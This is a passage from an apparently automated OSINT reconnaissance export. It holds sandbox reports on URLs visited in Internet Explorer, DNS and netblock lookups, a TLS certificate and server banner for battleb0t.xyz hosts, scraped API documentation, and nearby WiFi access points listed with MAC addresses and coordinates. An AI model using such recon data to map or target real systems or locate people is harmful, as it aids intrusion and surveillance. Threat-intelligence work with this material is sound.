u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.57): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:0B:05) | 50.8897, 6.0563 |
| 2023-05-12 02:46:20 | Netblock Membership | No | RIPE | 10 | 0 | 2 | 0 | None | 185.199.111.0/24 | 185.199.111.153 |
| 2023-05-12 02:46:26 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://privaterelay.appleid.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url6314.mail.nmacc.com/ls/click?upn=8UUcZfoU9ErRYP5rNGtgbirLN8xfc6bsTdjhpYE9O-2B6oIJCVLBVNxEMl4-2FlyZEXgpIcvOIsLdFwMmNMQ6pyipe-2BlH6ndePI6TegprE8-2FJ5TmwBSGqtoSQiQZMd1uQY0F6EMbvgZh-2FB54nRmur1hYZXb9DpD9Uaqar8AQBxXE9ZjEMEh9pj-2FNvjiSungY8Q-2BcGAEny7iKKiiOMOE4TVnhf8f7XNNG4vkRAhHBxDpFamm0IUZWV3z-2BlJLtiqNZocaeHRbn9q5OE4HMTBuJibaMxdHmJJ9cRGPg-2BIJz-2B-2F91yqQCKhq-2FDCeLChTKA7jVwK1Ouq-2FKIU-2FYhbkgDECGCTTIYKgHXPh2b3OYH9i7a6eI-2FAKkoa5wVpo9vtL32nYWta9ahz5vfUQqJE7rCOt9gGu6vQWShZJVtaDn-2FX0jLeh5IgiUHxe3oW8VqyzM8ypTZLDWj1E59I1JQ-2FktSv0rVnoCoiAb7P30xuBJWLqQ5lH4zPSwzQWh3Y6TkFHvj3cGgCyLHEq7_-2BOt3qy6nPPD-2BvPBT7bVtLrj9wxQ6PC4uiKPO00-2BGDcq4vCUL9jBCG2rzUktFCBBsWM9VDFDukFJsAvP5a2wlNm-2B1xvIYADajgidXgITH2clnmESRV-2BBkImikTYnjRiXwX9u5aj8UOixtxqSLd-2FknigE7ztnUTNb3Hm824FaNuRAjgM7w7tvQQ-2FLlxjpwO7cilXlMlvOUXGvEp4LRn9miTC4WQr-2FP80gqygKVr2Fvg-2F0JMdrNJ9JhF-2BavQqh-2F-2FWWK6tHbATUsKwjMalzZjASsgacGT9IwTW20bAz3NvT70G-2Be6bq15tVuvaeOKAiaoD-2B-2BGHYAAjoEMPIehIdac8BFr1v89Rh5h21H4kub2usLmqC3yC76UJPWE-2FAg-2FkbKljLX7rc5p70-2BTWNNS0fqLYZDnQPX9DQ4opuM2QB21j2WThAg-2Fa6lCRxasFq-2FKDHL-2BKRb', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a1c_IESQMMUTEX_0_519"\n 
"Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a1c_IESQMMUTEX_0_519"\n "IsoScope_a1c_IESQMMUTEX_0_303"\n "IsoScope_a1c_ConnHashTable<2588>_HashTable_Mutex"\n "IsoScope_a1c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2588"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a1c_IE_EarlyTabStart_0x9e8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "108.139.1.6:443"\n "116.50.97.93:443"\n "185.199.111.153:443"\n "142.251.46.174:443"\n "172.217.12.106:443"\n "18.155.181.57:443"\n "172.217.12.104:443"\n "142.250.191.42:443"\n "157.240.22.25:443"\n "142.251.214.130:443"\n "142.250.191.78:443"\n "142.250.191.66:443"\n "116.50.93.136:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nmacc.com"\n "pchen66.github.io"\n "tickets.jioworldcentre.com"\n "url6314.mail.nmacc.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"":signuphost:":"https://plus.google.com",ratingbadge:{url:"https://www.google.com/shopping/customerreviews/badge?usegapi=1"},appcirclepicker:{url:":socialhost:/:session_prefix:_/widget/render/appcirclepicker"},follow:{url:":socialhost:/:session_prefix:_/widget/render/follow?usegapi=1"},community:{url:":ctx_socialhost:/:session_prefix::im_prefix:_/widget/render/community?usegapi=1"},sharetoclassroom:{url:"https://classroom.google.com/sharewidget?usegapi=1"},ytshare:{params:{url:""},url:":socialhost:/:session_prefix:_/widget/render/ytshare?usegapi=1"}," (Indicator: "plus.google.com")\n "* [http://developers.facebook.com/policy/]. 
This copyright notice shall be" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":Fy(d.verticalThresholds,b,"vert.pct")}Ev("sdl","init",!1)?Ev("sdl","pending",!1)||J(function(){return Gy()}):(Cv("sdl","init",!0),Cv("sdl","pending",!0),J(function(){Gy();if(Hy()){var e=Iy();qc(z,"scroll",e);qc(z,"resize",e)}else Cv("sdl","init",!1)}));return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"},plus_share:{params:{url:""}," (Indicator: "youtube")\n "function My(a,b){var c=this;return b}My.M="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Ny=["www.youtube.com","www.youtube-nocookie.com"],Oy,Py=!1;" (Indicator: "youtube")\n "l=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gf:d,Ef:e,Ff:f,lg:g,mg:h,gd:l,Xa:b},p=z.YT,q=function(){Vy(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(Yy(w,"iframe_api")||Yy(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Py&&Wy(x[A],n.gd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n 
"person:{url:":socialhost:/:session_prefix:_/widget/render/person?usegapi=1"},savetodrive:{url:"https://drive.google.com/savetodrivebutton?usegapi=1",methods:["save"]},page:{url:":socialhost:/:session_prefix:_/widget/render/page?usegapi=1"},card:{url:":socialhost:/:session_prefix:_/hovercard/card"}}},h:"m;/_/scs/abc-static/_/js/k=gapi.lb.en.zUi2Oiqh0cQ.O/d=1/rs=AHpOoo-VnflFHGTzk3OsaVpWbqz0Ysb2Jw/m=__features__",u:"https://apis.google.com/js/api.js",hee:!0,dpo:!1,le:["scs"],glrp:false},platform:"backdrop blogger comments commentcount community donation family_creation follow hangout health page partnersbadge person playemm playreview plus plusone post ratingbadge savetoandroidpay savetodrive savetowallet sharetoclassroom shortlists signin2 surveyoptin visibility youtube ytsubscribe zoomableimage".split(" ")," (Indicator: "youtube")\n "Py=!0,b});return b}Zy.M="internal.enableAutoEventOnYouTubeActivity";var $y;function az(a){var b=!1;return b}az.M="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "transportUrl:b,context:c},R(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Hh.ia+"&cx=c";hs()&&(f+="&sign="+Hh.se);var g=Qh||Zh?gs(b,f):void 0;g||(g=So("https://","http://",Hh.Gd+f));Cl().destination[a]={state:1,context:c};mc(g)}};function is(){if(xl()){return!0}return!1};var ls=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ms={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},ns={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var Yv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0,f=0;return{createEvent:function(g,h,l){var 
n=a(),p=n.Lf,q=void 0!==l?Math.round(l):void 0!==h?Math.round(n.Lf*h):Math.round(n.Uh),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Hk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Av(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.4a45304c_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "api_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QA70RK48.txt" has type "ASCII text"- Location: [%APPDATA%\\Mic | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | KFA (Net ID: 00:00:CB:07:81:0E) | 50.1188, 8.6843 |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://nuke.battleb0t.xyz | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:5F:35) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:50:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:23.061 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:23.103 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:63:F4) | 41.8781, -87.6298 |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: <REDACTED>
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
| 165.232.113.85 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Wir (Net ID: 00:01:E3:51:05:D5) | 50.1188, 8.6843 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:07:50:41) | 52.3759, 4.8975 |
| 2023-05-12 02:58:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://texassuntexasmoon.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dd8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dd8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_dd8_IESQMMUTEX_0_303"\n "IsoScope_dd8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3544"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dd8_ConnHashTable<3544>_HashTable_Mutex"\n "IsoScope_dd8_IE_EarlyTabStart_0xf18_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"texassuntexasmoon.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"texassuntexasmoon.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDD29.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:80"\n "34.74.170.74:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: texassuntexasmoon.com" (Indicator: "user-agent: 
")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabDD18.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ZR04WK0P.txt" - Location: 